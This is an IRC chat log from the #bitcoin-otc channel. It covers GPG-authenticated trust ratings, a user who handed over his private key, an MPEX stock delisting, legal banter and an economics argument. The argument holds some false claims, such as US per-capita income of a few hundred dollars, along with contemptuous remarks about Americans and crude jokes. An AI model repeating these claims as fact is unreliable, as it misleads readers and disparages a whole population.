freenode:#bitcoin-otc:f3a98fc18f7f44dfc4e108c87e1cfd5aa354d8f1497ec4c17d11c7e2 Jan 17 00:31:43 You are now authenticated for user mircea_popescu with key 8A736F0E2FB7B452 Jan 17 00:31:48 smickles from what i heard. Jan 17 00:31:54 [BTCTC] [COGNITIVE] 3 @ 0.43 = 1.29 BTC [-] Jan 17 00:32:05 ;;rate rg -1 from what I understand person no longer has sole control of private key. Jan 17 00:32:06 Rating entry successful. Your rating for user rg has changed from 3 to -1. Jan 17 00:32:17 mircea_popescu: he'd have to have, for arji and them to pay divs, right? Jan 17 00:32:25 smickles logically, yes. Jan 17 00:32:40 ;;rate rg -10 gave away his private keys Jan 17 00:32:40 Error: For identification purposes, you must be identified via GPG to use the rating system. Jan 17 00:32:58 smickles mind that the system dioes not actually verify ownership Jan 17 00:33:30 it's not hard proof in that sense. Jan 17 00:33:48 [MPEX] [S.BVPS] 9761 @ 0.00130005 = 12.6898 BTC [-] Jan 17 00:33:50 [MPEX] [S.BVPS] 739 @ 0.0002 = 0.1478 BTC [-] Jan 17 00:34:00 YAY1 Jan 17 00:34:08 what, you were buying ? Jan 17 00:34:13 was waiting to see if the .0002 would get hit Jan 17 00:34:15 f no Jan 17 00:34:26 just like to see the last gasp of a dying creature Jan 17 00:34:36 !ticker m s.bvps Jan 17 00:34:38 [MPEX:S.BVPS] 1D: 0.0002 / 0.00122262 / 0.00130005 (10500 shares, 12.84 BTC), 7D: 0.0002 / 0.00131668 / 0.00635541 (10696 shares, 14.08 BTC), 30D: 0.0002 / 0.00243135 / 0.00635541 (23929 shares, 58.18 BTC) Jan 17 00:34:43 [BTCTC] [BTC-GOLD] 1 @ 0.0433 BTC [+] Jan 17 00:35:09 ;;unrate rg Jan 17 00:35:11 Successfully removed your rating for rg. Jan 17 00:35:39 arij: how were ya'll able to pay s.bvps dividends? Jan 17 00:36:11 For December? Jan 17 00:36:37 well, at all. I mean how were you able to run the command on mpex? Jan 17 00:36:58 it's something that just recently poped on my interest meter Jan 17 00:37:00 ny has some funny class e felonies. "Promoting a suicide attempt". "Stalking in the second degree". "Abortion in the second degree". "Female genital mutilation". "Substitution of children". "Computer trespass". "Welfare fraud in the fourth degree". Jan 17 00:37:01 etc Jan 17 00:37:26 substitution of children? Jan 17 00:37:43 Rent gouging, Unlawfully concealing a will, Unlawful possession of personal identification information in the second degree Jan 17 00:37:57 Nam was taking care of that, I've never personally used mpex Jan 17 00:37:58 Rewarding official misconduct in the second degree. like what, voting ? Jan 17 00:38:19 smickles: rg gave his gpg keys Jan 17 00:38:19 http://ypdcrime.com/penal.law/e_felonies.htm list really kicks ass. Jan 17 00:38:30 theres some bylaw in our capital that hotels must provide horse tethering facilities Jan 17 00:38:30 Namworld: ah, that's too bad Jan 17 00:38:31 Unlawfully dealing with fireworks Jan 17 00:38:39 that means he has no interest in WoT Jan 17 00:38:43 ;;eauth Jan 17 00:38:43 (eauth ) -- Initiate authentication for user . You must have registered a GPG key with the bot for this to work. You will be given a link to a page which contains a one time password encrypted with your key. Decrypt, and use the 'everify' command with it. Your passphrase will expire in 10 minutes. Jan 17 00:38:46 ;;eauth smickles Jan 17 00:38:47 Request successful for user smickles, hostmask smickles!~smickles@mostofmany.com. Get your encrypted OTP from http://bitcoin-otc.com/otps/EA62D7CEB2450C3F Jan 17 00:38:48 He's gone gone Jan 17 00:38:51 jcpham pretty crazy, isn't it. Jan 17 00:38:55 what keys Jan 17 00:38:56 yes Jan 17 00:39:17 ;;everify freenode:#bitcoin-otc:8926d9daa6911895a4b7dfc67516b590f01432eae6b601b77780a3c8 Jan 17 00:39:18 You are now authenticated for user smickles with key EA62D7CEB2450C3F Jan 17 00:39:21 err, sorry. what keys were given out? i've been ill so im just trying to catch up Jan 17 00:39:22 the private key to his gpg identity Jan 17 00:39:29 wat Jan 17 00:39:36 ;;rate rg -10 gave away his private key Jan 17 00:39:38 Rating entry successful. Your rating for user rg has changed from 2 to -10. Jan 17 00:39:54 ;;getrating rg Jan 17 00:39:54 WARNING: Currently not authenticated. User rg, rated since Sun Jun 5 10:39:49 2011. Cumulative rating 321, from 159 total ratings. Received ratings: 156 positive, 3 negative. Sent ratings: 148 positive, 17 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=rg Jan 17 00:40:15 nyRednek he was well known for a long time. Jan 17 00:40:33 mircea_popescu, so it seems Jan 17 00:40:42 so which security is he running? Jan 17 00:40:47 He can easily verify his identity and get a new gpg key Jan 17 00:40:50 Namworld, arij i'd like you know that I don't fault you guys for using the keys tho Jan 17 00:40:52 was, s.bvps Jan 17 00:41:08 No need to neg rate :/ Jan 17 00:41:23 i unrate drama cases Jan 17 00:41:58 sad news though about thgpg key Jan 17 00:42:25 he was in -otc the other day Jan 17 00:42:28 grubles too Jan 17 00:42:29 i guess people just don't realise that's the absolute limit of what you can't do. Jan 17 00:42:33 yeah i saw that Jan 17 00:42:42 i bought some silver from grubles Jan 17 00:43:23 after i made him auth Jan 17 00:43:36 [MPEX] [S.DICE] 206 @ 0.00539588 = 1.1116 BTC [-] Jan 17 00:43:38 ;;rate rg -5 Gave away private key to WoT account. And this: http://trilema.com/2013/sbvps-delisting-notice Jan 17 00:43:39 Rating entry successful. Your rating of -5 for user rg has been recorded. Jan 17 00:44:12 That's the first neg rating i've given out. I'd like to hear from rg about all of this though. Jan 17 00:44:38 I doubt he gives a shit Jan 17 00:44:39 the whole idea of using gpg with the wot revolved around contracts, if he gave his personal signing ability to someone else, i can't be sure that any contract I sign with that key has ever been "real" Jan 17 00:44:51 right Jan 17 00:44:55 totally Jan 17 00:45:02 big no-no Jan 17 00:45:02 yeah, keeping private keys private is capital. Jan 17 00:45:15 without that, we're lost Jan 17 00:45:18 He gave it strictly on account he had to leave BitVPS to someone else. Jan 17 00:45:43 [MPEX] [O.BTCUSD.C130T] 1 @ 0.11872201 BTC [-] Jan 17 00:45:43 Namworld i understand there's no ill will. Jan 17 00:45:47 no one is blaming you guys Jan 17 00:45:57 rg should've known better or known the ramications Jan 17 00:45:59 D: Jan 17 00:46:02 should the WoT discover this Jan 17 00:46:02 mircea_popescu: couldn't the account priviges have been transferred? Jan 17 00:46:03 jcpham or at least asked. Jan 17 00:46:06 (to another key) Jan 17 00:46:06 did he just hand it over so you could access his mpex account with the remaining shares? Jan 17 00:46:18 smickles no. that's the entire idea of mpex. that you can't just pass things around. Jan 17 00:46:31 [MPEX] [O.BTCUSD.P130T] 1 @ 0.03844519 BTC [+] Jan 17 00:46:41 mod6, pretty much Jan 17 00:46:48 you make a company, it's yours. shareholders can't kick you out. you can't "sell" your interest. Jan 17 00:46:56 company may be acquired, sure, but as a corp merger or somesuch. Jan 17 00:47:03 ahh. he should have just used PUSH and he could have avoided a lot of issues Jan 17 00:47:24 What about dividends? Jan 17 00:47:24 mod6 basically he decided he'll do something that couldn't be done contractually Jan 17 00:47:33 and just charged ahead with it. Jan 17 00:47:38 :( Jan 17 00:47:44 which is possibly the only part i'd complain about it. not like im not fucking here all the rtime Jan 17 00:47:55 or i charge a bitcoin per line to advise or anything. Jan 17 00:47:59 yeah, everything that happened wasn't really allowed by the contract Jan 17 00:48:01 [MPEX] [S.MPOE] 18050 @ 0.00064635 = 11.6666 BTC [-] Jan 17 00:48:13 MadSweeney makomk malaimo markedathome maximian midnightmagic MiningBuddy- mircea_popescu mod6 Jan 17 00:48:25 so just how fucking hard it is to go /query mircea_popescu hey dude here's what i want to do, does it work how should i do it Jan 17 00:48:44 right. everytime i have a question or something, you're there pretty quick to help Jan 17 00:48:50 i don't know what the problem was there Jan 17 00:49:44 i imagine a large part of the problem was that bvps suddenly seemed very small, in btc terms Jan 17 00:49:53 and so not really a priority or anything Jan 17 00:50:12 nyRednek: in order for that software dev to be convicted, the code he wrote would have to be 'bookmaking' (in the gambling sense ) software Jan 17 00:51:00 or Jan 17 00:51:44 apparently, reciving gambled money is promoting gambling in the first degree Jan 17 00:52:04 he made a tool that allows others to run a site Jan 17 00:52:07 i wonder if that means that any shareholder of S.DICE is breaking this law Jan 17 00:52:13 DA can charge Jan 17 00:52:17 can he convict? Jan 17 00:52:30 most people don't want to take the risk Jan 17 00:52:37 of a fight Jan 17 00:52:42 Bugpowder_ which is how the system works, over there. Jan 17 00:53:12 also, did you notice that not talking to the cops can get you convicted of murder? Jan 17 00:53:37 well, it's up to the supreme court anyway Jan 17 00:53:44 o they picked it ?! Jan 17 00:53:59 smickles, one or the other, i'm not following the case as closely as i should, tbh Jan 17 00:54:11 boils down to a cop saying "hey, your not under arrest, but is it possible that those shotgunshells at the murder scene are yours?" Jan 17 00:54:20 you don't answer, your're a murder Jan 17 00:54:22 *er Jan 17 00:54:25 [MPEX] [S.MPOE] 3944 @ 0.000647 = 2.5518 BTC [+] Jan 17 00:54:25 lol Jan 17 00:54:29 wtf bs is that ? Jan 17 00:54:44 Bugpowder_, new york jurors don't have as much reasonable doubt as one should, tbh Jan 17 00:54:55 the bs is they say it's not covered by the 5th b/c he wasn't under arrest YET Jan 17 00:55:04 AHAHAHA Jan 17 00:55:14 anyone actually takes that seriously ? Jan 17 00:55:19 smickles, sounds about right Jan 17 00:55:19 this is why we don't live in 'murica Jan 17 00:55:22 i guess that's why they like a lot of them "low information voters" around. Jan 17 00:55:54 smickles, also, in indiana, cops don't have to knock and announce before executing a search warrant Jan 17 00:55:59 now i'm spooked by the last time I was pulled over, and didn't say a wort to the cop Jan 17 00:56:25 lol what did you do? Jan 17 00:56:31 nyRednek: in missouri they come in and shoot your pomeranian Jan 17 00:56:37 he was transporting a 720lb torpedo Jan 17 00:56:39 smickles, the best vague answer, "i don't know what you're talking about, officer" Jan 17 00:56:40 atop his converted dodge Jan 17 00:56:45 dub: I was driving Jan 17 00:56:59 smickles: yeah what did you do during the interaction Jan 17 00:57:20 you just handed over ID and pretended to be mute? Jan 17 00:57:22 dub: politely smiled and let him talk Jan 17 00:57:30 i wonder what sort of misdemeanor it is if you just jack off while the cop tries to talk to you Jan 17 00:57:41 mircea_popescu, that's disorderly conduct Jan 17 00:57:42 public indecency i suppose Jan 17 00:57:46 mircea_popescu: rape no doubt Jan 17 00:57:59 nyRednek i would have imagined not speaking english is disorderly conduct Jan 17 00:58:02 dub: he claimed that I had a tail light out, it wasn't true, so he gave me an 'unwritten warning' Jan 17 00:58:05 (or spanish) Jan 17 00:58:06 definitely rape if semen touches the cop Jan 17 00:58:19 jcpham what if clothes but no cop ? Jan 17 00:58:31 well, in NYC, it's disorderly conduct...it's assaulting an officer if semen touches Jan 17 00:58:33 improper textile soiling in the 3rd degree ? Jan 17 00:58:34 clothes might count Jan 17 00:58:49 mircea_popescu: unlicensed sperm odnation Jan 17 00:58:52 same as spitting on a cop...assault Jan 17 00:58:53 donation* Jan 17 00:58:54 maybe the clothes is just sexual assault Jan 17 00:59:23 i think ejaculating on an officer might be felony territory Jan 17 00:59:44 WTF is this zamboni game on google?!? Jan 17 00:59:47 i would guess it'd depend if they enjoyed it Jan 17 00:59:57 ha Jan 17 00:59:59 felonious assault of an officer Jan 17 01:00:15 same as screaming, "i'm gonna fuck you up, piggy" Jan 17 01:00:24 the lonious assault of an officer if you play that shit too loud Jan 17 01:00:44 smickles: I asked my canukistani friend if it signified anything, apparently not Jan 17 01:00:50 threatening is assault now ? Jan 17 01:01:06 mircea_popescu, threatening has always been assault Jan 17 01:01:10 yeah Jan 17 01:01:13 mircea_popescu, when you strike, it's battery Jan 17 01:01:54 apprehension yeah Jan 17 01:01:55 it has to be an earnest threat to be assult tho Jan 17 01:01:55 right you are. Jan 17 01:02:06 otherwise, it's bullying Jan 17 01:02:15 like if i threaten to kill you i need to own a weapon first? Jan 17 01:02:23 or the threat of death is enough Jan 17 01:02:26 which is usually illegal now too (bullying) Jan 17 01:02:32 :-) Jan 17 01:02:39 jcpham, threat of death is enough for assault, terroristic threatening Jan 17 01:02:59 smickles, that was a stupid law that apportioned activity that was already covered by the penal code Jan 17 01:03:09 but what if i have down's syndrome and i'm not actually a threat Jan 17 01:03:09 think of the children! Jan 17 01:03:31 jcpham: well, as I understand it, you can threaten to kill all you want if its a joke, but proving it's a joke can be tricky in some situations Jan 17 01:03:45 redundant sections of the penal code should be excised Jan 17 01:04:04 i've never made a death threat that i know of Jan 17 01:04:06 nyRednek: you suffer from the is/ought distinction Jan 17 01:04:25 jcpham: you threatent to pay me once, i've got it in writing Jan 17 01:04:36 redundant sections of law in general need to be excised, at all levels Jan 17 01:04:39 iirc, you made good on the threat too :P Jan 17 01:04:52 payment threats Jan 17 01:04:54 nyRednek ideally, the law should fit in fifty pages. Jan 17 01:05:07 that's how i'd have it. you want to make a new law ? gotta wipe old one first, make space. Jan 17 01:05:12 you get 64kb. Jan 17 01:05:14 mircea_popescu, maybe not fifty pages, but less than a full library of volumes Jan 17 01:05:22 fifty pages Jan 17 01:05:28 all lwas ought to fit in 640k of RAM Jan 17 01:05:30 so that highschoolers can be required to know the whole law by heard Jan 17 01:05:33 or else not graduate. Jan 17 01:05:37 mircea_popescu: then law will grow at a rate = to compression tech Jan 17 01:05:45 compression is finite. Jan 17 01:05:58 and also not allowed. Jan 17 01:06:10 hell, definitions don't fit in 50 pages Jan 17 01:06:13 64kb of [azAz09.-] Jan 17 01:06:18 nyRednek tough. Jan 17 01:07:39 noone yet congratulated me on my creation of another person :| Jan 17 01:07:46 o ? Jan 17 01:07:49 congrats! Jan 17 01:07:52 cigar or no cigar ? Jan 17 01:08:01 hell, the 1783 treaty of paris didn't fit in 50 pages Jan 17 01:08:06 nyRednek tough. Jan 17 01:08:18 mircea_popescu: http://starpas.azcc.gov/scripts/cgiip.exe/WService=wsbroker1/names-detail.p?name-id=L18030781&type=L.L.C. Jan 17 01:08:21 smickles, i've done it a few times, you have my sympathies Jan 17 01:08:22 if ignorance of the law is no defence then the law fits in 64kb Jan 17 01:08:37 smickles a hehe that kind. well grats nonetheless Jan 17 01:08:47 :D Jan 17 01:09:08 the next real person should be coming around may Jan 17 01:09:16 let people add to the 64kb through private contract if they want to. Jan 17 01:09:31 and a cigar would be in order if all goes well Jan 17 01:09:31 oh, contract law is an entirely new matter Jan 17 01:09:37 as is common law Jan 17 01:09:48 and case law Jan 17 01:10:13 case law being precedent set by court rulings as to the proper interpretation of law Jan 17 01:10:48 i don't like that idea Jan 17 01:11:04 smickles, which idea? Jan 17 01:11:32 many of our legal conventions are handed down by precedent Jan 17 01:11:47 that the first interpretation should necessarily affect any following Jan 17 01:12:02 unless you live under napoleonic code, which throws legal precedent out the window Jan 17 01:12:16 mircea_popescu: that's romania, right? Jan 17 01:12:21 vampires and such Jan 17 01:12:48 smickles, but, in reality, the english system follows the construct of legal precedent Jan 17 01:13:04 smickles, otherwise, we'd have no interpreted right to privacy Jan 17 01:13:38 most of europe, including romania yes. Jan 17 01:13:47 but there's still a version of precedent used, just... differently. Jan 17 01:15:10 smickles you got your license on my birthday Jan 17 01:15:34 you don't have to thank me though Jan 17 01:15:34 iirc, doe v bolton, 1973 Jan 17 01:16:20 jcpham: It will foever be known as jcpham day in the company by-laws Jan 17 01:16:48 hahaha Jan 17 01:17:13 also, there's no business license yet, the company had to be formed before it could see one of those Jan 17 01:17:33 there's a federal tax id tho Jan 17 01:17:49 s/see/seek/ Jan 17 01:17:58 cool beans Jan 17 01:19:09 nice smickles! Jan 17 01:19:36 (on the LLC) Jan 17 01:19:51 sorry, it was row v wade, 1973 Jan 17 01:20:04 [MPEX] [S.MPOE] 12200 @ 0.00066525 = 8.1161 BTC [+] Jan 17 01:21:21 heh you mean that wasn't just bait ? Jan 17 01:21:59 mod6: thanks :) Jan 17 01:22:40 nyRednek: that's privacy extending from property rights tho, isn't it? Jan 17 01:22:53 smickles, i believe, so Jan 17 01:23:16 smickles, the 14th amendment was referenced, so maybe not Jan 17 01:24:06 the 14th amendment deals mainly with citizenship Jan 17 01:24:07 [MPEX] [S.MPOE] 9075 @ 0.00066525 = 6.0371 BTC [+] Jan 17 01:25:12 "nor shall any state deprive any person of life, liberty, or property, without due process of law" Jan 17 01:25:25 it specifically says property tho Jan 17 01:25:33 http://i.imgur.com/3zWPK.jpg Jan 17 01:25:34 this is rich Jan 17 01:26:04 mircea_popescu: the department of homland security suggests that you uninstall and not use java Jan 17 01:26:53 why thanks very much to the dept of who the fuck asked them Jan 17 01:27:01 nyRednek: so my view of it from that perspective is that you only have privacy in so much as the state isn't allowed to do things why render your ownership of property meaningless Jan 17 01:27:05 are they coming up with those booklets on spouse selection already ? Jan 17 01:27:38 oh wait i can select another spouse Jan 17 01:27:44 or an additional spouse Jan 17 01:27:54 do i get to share than revenue stream also? Jan 17 01:28:19 smickles, also, katz v united states, 1967 Jan 17 01:28:28 regarding unwarranted wiretapping Jan 17 01:28:45 referencing 4th and 5th amendments Jan 17 01:29:07 jcpham surely Jan 17 01:29:35 smickles, also, right to privacy preventing illegal search/seizure, and self-incrimination Jan 17 01:31:25 smickles, i'm thinking it's more the liberty thing...the state is depriving you of liberty by snooping on you(privacy is a safeguard of free speech) Jan 17 01:33:47 the security issues regarding java have been many, so i tend to agree with OHS on this one Jan 17 01:35:31 nyRednek the point is the homeland security thing has no business discussing this, or pretty much any other matter. Jan 17 01:35:46 their job is pretty much getting tsa dismantled already and then going away in the sunset. Jan 17 01:37:17 mircea_popescu, OSA is a large and wide-reaching organization...this is very much their business Jan 17 01:37:25 OHS, rather Jan 17 01:37:37 too many three letter names Jan 17 01:38:02 right, it works in practice as a sort of soviet commisariat of the people's soviets bla bla Jan 17 01:38:08 tsa is just one of their subordinate agencies Jan 17 01:38:16 but it's mandate legally is exactly that : to dismantle the tsa and go away. Jan 17 01:38:18 the fbi is another of their subordinate agencies Jan 17 01:38:27 so is ice Jan 17 01:38:40 its mandate is much more than dismantle tsa Jan 17 01:38:54 [MPEX] [S.MPOE] 5843 @ 0.00066094 = 3.8619 BTC [-] Jan 17 01:39:00 really sad to watch (from a safe distance, blesfully) what's happening to that country. Jan 17 01:39:53 here's the sad thing to watch...the US is the world's largest economy...if it falls, how well do you think the EU or the PRC will do in the ashes? Jan 17 01:40:24 i mean the ashes of what used to be the US's GDP Jan 17 01:40:31 it's neither the world's largest economy Jan 17 01:40:36 nor actually providing anything of value Jan 17 01:40:40 the world won't notice. Jan 17 01:40:47 the delusions to the contrary are actually part of the "sad". Jan 17 01:41:13 the US has the world's largest GDP, and nations such as PRC depend on consumption by US Jan 17 01:41:18 does dhs know that java is patched? Jan 17 01:41:20 this is nonsense Jan 17 01:41:27 no producer "depends" on consumption by anyone. Jan 17 01:41:33 or is it a case of sun fucked up one too many times and are written off Jan 17 01:41:43 dub they just wish to opine. Jan 17 01:41:48 sun is dead Jan 17 01:41:53 mircea_popescu, actually, producers need consumers to buy products Jan 17 01:41:56 and isn't dhs the dept of welfare i mean human services ? Jan 17 01:41:59 oracle w/e Jan 17 01:42:02 mircea_popescu, it's backwards to think otherwise Jan 17 01:42:03 nyRednek that's nonsense. producers need noone Jan 17 01:42:06 consumers need producers. Jan 17 01:42:11 dub: it's not really patched Jan 17 01:42:33 mircea_popescu: comsumes women thus he needs mothers Jan 17 01:42:43 so far they have released 2 different "patches" that "fix" the same vuln, but not really Jan 17 01:42:54 iz 3rds a charm Jan 17 01:42:57 haha Jan 17 01:43:08 mircea_popescu, let's put it this way, kodak failed because...? Jan 17 01:43:20 because it wasn't producing anything. Jan 17 01:43:21 mircea_popescu, they produced a lot of film and cameras... Jan 17 01:43:29 mircea_popescu, that's not true Jan 17 01:43:31 no. they produced a lot of useless junk. Jan 17 01:43:34 course it's true. Jan 17 01:43:38 also, if you consider the EU as it's own entity, it's got greater GDP than USA, right? Jan 17 01:43:47 kodak is a much more interesting beast Jan 17 01:43:50 if you make a huge company "producing" "art" you will fail too Jan 17 01:43:50 iz, not yet, it doesn't Jan 17 01:44:03 nyRednek: look at the numbers for 2011 Jan 17 01:44:05 iz if you discount imaginary/funny money Jan 17 01:44:11 the us is about on par with pakistan atm. Jan 17 01:44:18 per capita income in the 100-1000 range. Jan 17 01:44:32 iz, well, as of 2010 it wasn't, let me check Jan 17 01:44:42 and for that matter, i too can write 10000000000000000 dollah on pieces of paper and trade it back and forth with the girls Jan 17 01:44:47 nyRednek: http://en.wikipedia.org/wiki/List_of_countries_by_GDP_(nominal) Jan 17 01:44:51 that won't make my harem the world's largest economy Jan 17 01:46:08 here's a listing per capita (for all ranges) http://en.wikipedia.org/wiki/List_of_countries_by_GDP_(PPP)_per_capita Jan 17 01:46:20 iz, by 2.6 quadrillion, yep, the EU has surpassed the US Jan 17 01:46:43 iz, you're right...well, the SECOND largest world economy Jan 17 01:46:51 whoops, i meant this one: http://en.wikipedia.org/wiki/List_of_countries_by_GDP_(nominal)_per_capita Jan 17 01:46:56 soon to be the tenth. Jan 17 01:47:13 mircea_popescu: great, maybe finally we won't be too big to fail Jan 17 01:47:16 [MPEX] [S.MPOE] 16951 @ 0.00066525 = 11.2767 BTC [+] Jan 17 01:47:25 and we can pull an iceland Jan 17 01:47:27 guys, let me know when mircea_popescu stops talking out of its ass so i can unignore Jan 17 01:47:28 i'd be willing to take bets that by 2015 the us economy will actually be smaller than germany's economy. Jan 17 01:47:33 sadly there's no actual way to measure. Jan 17 01:48:02 mircea_popescu: yeah, cuz the germans use metric and the us doesn't :b Jan 17 01:48:08 key element :D Jan 17 01:48:53 but i am kinda amused at the newb krugerite coming here and giving me advice about mpex and then getting offended when i don't happen to share his ignorance of economy. Jan 17 01:49:35 this incidentally is exactly why i wouldn't buy the whole us for five bitcoins right now : pretty much made up entirely of this sort of stupid. Jan 17 01:49:44 sure, there's exception. too much molasses around them to have a chance. Jan 17 01:50:10 cynical much? Jan 17 01:50:17 kinda, yeah. Jan 17 01:50:18 sorry, 2.6 trillion Jan 17 01:50:50 iz, as far as it goes, though, one of the top four players fall, the whole world suffers... Jan 17 01:51:18 literally pocket change Jan 17 01:51:22 the more the world goes to shit, the better for bitcoin Jan 17 01:51:26 so the us dollar and the euro are pretty critical to gobal economic health Jan 17 01:51:26 yeah, i'd tend to agree Jan 17 01:51:32 global Jan 17 01:51:43 nyRednek!*@* added to ignore list. Jan 17 01:51:43 that's why iceland was able to do what they did.. just ignore all the debt, right? Jan 17 01:52:02 because they weren't in the top 3-4, they can do that and everyone else just absorbs the costs Jan 17 01:52:08 iz i guess mostly cause they were small. Jan 17 01:52:13 exactly Jan 17 01:52:28 and people didn;t want to argue with them for the obvious reason of publicity. Jan 17 01:52:35 ie, others may see they actually have a point. Jan 17 01:52:35 i hate it when ppl try to argue with me that the US should have just followed iceland's lead and let all the banks fail instead of bailing them out Jan 17 01:52:44 why ? Jan 17 01:52:48 i happen to think the same thing. Jan 17 01:52:55 [MPEX] [S.MPOE] 7268 @ 0.00066486 = 4.8322 BTC [-] Jan 17 01:52:56 course, this in retrospect. Jan 17 01:52:57 [MPEX] [S.MPOE] 12807 @ 0.00065893 = 8.4389 BTC [-] Jan 17 01:53:05 i can see why they tried, at the time, and why they couldn't stop, after they tried. Jan 17 01:53:10 too big to fail Jan 17 01:53:17 really? well, it seems to me like that's something that only countries w/ small economies can do Jan 17 01:53:20 so it's not really a "should have". more like a, that'd have been retrospectively the correct path Jan 17 01:53:26 iz why ? Jan 17 01:53:36 because someone has to foot the bill Jan 17 01:53:51 and it ends up being all the other contries that participate in the world economy, right? Jan 17 01:54:01 it's just ego. no us politician can actually man up and say "listen, we fucked up. we were wriong. Jan 17 01:54:07 welfare does not work, what we were trying to build doesn't work Jan 17 01:54:15 you are all lazy bums and thieves, Jan 17 01:54:19 if the biggest country tries to do this, they rest of they can't absorb that much loss that quickly Jan 17 01:54:31 and if given a chance you will steal and idle rather than do somethinguseful Jan 17 01:54:38 and in any case you're too stupid by now to do anything useful anyway" Jan 17 01:54:41 and that's that. Jan 17 01:55:02 salaries go back to the economically warranted 5-600 usd a year Jan 17 01:55:04 http://www.whitehouse.gov/issues/preventing-gun-violence Jan 17 01:55:08 conspiracy Jan 17 01:55:08 people learn to live off rice and beans Jan 17 01:55:15 rents go back towhat they are in the 3rd world and so on. Jan 17 01:55:18 no way the gubment can code this well this fast Jan 17 01:55:22 conspiracy Jan 17 01:55:35 mircea_popescu: i think it would affect the world economy too much Jan 17 01:55:40 that page is fucking sick though Jan 17 01:55:45 iceland could get away w/ it b/c they were small Jan 17 01:55:49 iz : there is no "too much". it is what it is. Jan 17 01:55:53 protip: the "world eceomony" has like 10 years left anyway Jan 17 01:55:56 take the pill and pay the dues. Jan 17 01:56:04 i don't understand why you say there isn't a "too much" Jan 17 01:56:09 because there isn't. Jan 17 01:56:10 after that its back to eating each other Jan 17 01:56:28 there is literally no limit to human suffering and hardship. none. Jan 17 01:56:39 so, let it go back to where it has to go, rather than try and pretend for a coupl;a more years Jan 17 01:56:52 if a country wants to say "we fucked up, but we aren't going to pay our debts.. everyone else just absorb those costs and we're going to start over.. like country bankruptcy Jan 17 01:57:02 that's not the deal. Jan 17 01:57:06 it's we fucked up, we own nothing now Jan 17 01:57:12 maybe we'll just all become indentured servants Jan 17 01:57:14 or just starve Jan 17 01:57:16 MIT forcast it in the '70s and we have been tracking perfectly Jan 17 01:57:19 is that what iceland did too? Jan 17 01:57:21 we'll see how generous you are Jan 17 01:57:26 i thought they just said we don't owe anything Jan 17 01:57:34 sorry for investing all your money in our banks Jan 17 01:57:40 but you guys all lost out too Jan 17 01:57:45 and we're starting over now Jan 17 01:57:53 the two aren't distinct really. Jan 17 01:57:56 we all lost, but it happens.. restart now Jan 17 01:58:24 is my understanding incorrect re: iceland? Jan 17 01:58:37 i don't think so. Jan 17 01:58:55 as far as i understand, the iceland thing was simply : banks are a private issue, the state does not back banks. figure it out. Jan 17 01:58:55 cool Jan 17 01:59:02 yeah Jan 17 01:59:05 that's what i thought also Jan 17 01:59:14 ok. that doesn't translate to what you said Jan 17 01:59:23 so yeah.. i think they can only get away with that because they were so small relative to the rest of the world economy Jan 17 01:59:43 they can get away with it because the gap between their real gdp and their nominal gdp was small Jan 17 01:59:49 in the us the difference is more like 9x% Jan 17 01:59:50 if one of the largest world economies tried to do what iceland did, i think it would cause worldwide economical harm Jan 17 01:59:55 no. Jan 17 02:00:00 [MPEX] [S.MPOE] 16596 @ 0.00066525 = 11.0405 BTC [+] Jan 17 02:00:06 it would just force a much more unpalatable "taking down a notch" Jan 17 02:00:29 hmm.. okay, i think i'm understanding what you're saying Jan 17 02:00:42 here's the thing : Jan 17 02:00:51 the average american citizen uses up about 20k worth of resources a year. Jan 17 02:00:57 he produces something like 500 to 1k. Jan 17 02:01:03 that's a 90ish % loss. Jan 17 02:01:16 if you stop pretending like what they're doing is useful, Jan 17 02:01:21 is that like maff and fings Jan 17 02:01:22 you're forced to adjust their income to the real level. Jan 17 02:01:25 this is bitcoin Jan 17 02:01:41 making us average salari about 400 bucks ? a year that is. Jan 17 02:01:57 nyRednek: chinese factory workers are used to losing all their miney overnight though Jan 17 02:02:17 money* Jan 17 02:02:17 now, the average american trying to live on 400 bucks a year would be a funny sight indeed. Jan 17 02:02:24 but the world economy couldn't care less. Jan 17 02:02:41 nyRednek: good Jan 17 02:03:05 drastic reduction in the number of americans would go a long way to solving the problem Jan 17 02:03:06 but how would the us maintain their obesity record? Jan 17 02:03:17 i don't see how. donner party patent method maybe ? Jan 17 02:03:21 you're only delaying it as of now Jan 17 02:03:41 now, understandably the political decision was made that this wouldn't be acceptable. but this is a purely internal affair of the us. i can sorta see why they thought this too : Jan 17 02:03:53 if they keep it going for just a little longer the top people can finish getting out Jan 17 02:03:56 nyRednek: the problem with your economy not actually being one Jan 17 02:04:16 haha Jan 17 02:04:17 nyRednek: sorry I thought that was the subject Jan 17 02:04:21 but otherwise, it's the same as any imploding rogue state. Jan 17 02:04:23 hunting w/ automatic assult rifles Jan 17 02:04:47 nyRednek: no, not actually being an economy Jan 17 02:05:09 real answer though, as a hunter you realize there's not enough animals to sustain the population Jan 17 02:05:13 its a sick joke/debt ponzi Jan 17 02:05:36 maybe hunting the most dangerous game for soylent green Jan 17 02:05:47 iz nailed it Jan 17 02:06:12 nyRednek: can't hunt the animals that aren't there because they've already been over hunted Jan 17 02:06:24 nyRednek also nailed the actual problem Jan 17 02:06:44 yeah, the real problem with food is water and ancient aquifirs Jan 17 02:07:07 that's true Jan 17 02:07:32 CoinURL ceases its operation Jan 17 02:07:59 whats coinurl? Jan 17 02:08:03 https://bitcointalk.org/index.php?topic=136900.0 Jan 17 02:08:15 ah yes... the prized nosegopher Jan 17 02:08:20 good eating Jan 17 02:08:55 >> Unluckily, as you could guess, hosting company decided to terminate my account as it is not just worth for them anymore. Jan 17 02:08:56 LOLWTF Jan 17 02:09:05 no, i could not guess THAT Jan 17 02:09:14 mircea_popescu: lol 'derp' Jan 17 02:09:50 commentig coinurl Jan 17 02:09:55 turns out bitcoiners don't spend money (because mom doesn't give them enough) Jan 17 02:10:16 i dunno what the deal was but it ready just wrong Jan 17 02:10:26 http://trilema.com/2012/coinurl-a-bitcoin-advertising-service/ for the lulz. Jan 17 02:12:05 i have a friend with a whole bladecenter intalled for some tiny change cause hosting co made a lousy contract Jan 17 02:12:34 "There are many options. Delisting and telling everyone to just fuck off is exactly what can be expected form a narcissistic fucktard like Mircea Popescu. Jan 17 02:12:34 Why not halt the trading for start and provide a way to work this out between investors and those thieving scumbags at BitVPS." Jan 17 02:12:37 this guy is kinda stupid is he ?! Jan 17 02:13:24 dude Jan 17 02:14:37 [MPEX] [S.MPOE] 17400 @ 0.00066525 = 11.5754 BTC [+] Jan 17 02:21:23 lol, bitvps kicked coinurl Jan 17 02:21:41 what Jan 17 02:21:49 lol r u srs Jan 17 02:22:02 you just dont do that. Jan 17 02:22:05 jurov srsly ?! Jan 17 02:22:31 yes, they 